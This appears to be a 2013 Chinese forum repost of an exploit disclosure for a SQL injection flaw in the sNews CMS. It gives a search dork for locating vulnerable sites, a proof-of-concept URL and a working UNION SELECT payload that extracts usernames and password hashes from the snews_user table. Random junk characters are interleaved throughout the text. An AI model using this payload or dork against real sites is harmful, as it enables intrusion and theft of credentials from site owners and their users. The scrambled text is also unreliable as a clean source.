标题: CMS snews SQL Injection Vulnerability
0 \) G/ J+ q: L6 B" z作者: By onestree
& x5 ^1 w D5 L9 C: l( d; }4 Y下载地址 : http://snewscms.com/
, k( _1 p1 i3 D3 E- S. x! i# d) h) R, c测试平台 : ubuntu 12.10 / win 7
+ [' @- I" U+ O* {" u- s- l8 a关键词: inurl:"tanyakan pada rumput yang bergoyang"
# {- p; m+ B' [! O6 [5 b6 l
8 q8 v4 O, X. U' ^2 h$ W
: x+ f; L' |5 O6 ^. J$ | t*************************************************************
" n. Q# g$ ]4 o
9 M x+ r7 W$ @, Z1 L) TSQL poc:
: \7 P* K) ~+ h
" w+ l& }5 P# Ehttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]8 T* X% W) h5 u
' B" q5 e. _" r6 L' l7 z. D示例
% y; d, {& F: a' R4 M. [ 8 i0 p* g$ D I) O0 m4 P
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*) F2 T F: O# G7 X
$ a. c6 h- r& E" M8 w. p! J' S" l
2 z; O! B% R1 t- }( U9 `/ w( p致谢:
, i! ?( a$ `2 w& m* F# W
( \7 f6 u( [0 s! K. L0 K Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell% v* r: o; t1 o9 |0 @ _& x
% W7 c& T6 t$ Y Q indonesiancoder - moeslimh4x0r - go-coder
' E8 m* d" J9 y9 {& z2 G
# c$ P+ r6 E- j. Rspesial my hunny :*
" _# b3 \* A1 Q# a1 z! M |
发表于 2013-1-23 08:55:06
收藏
支持
反对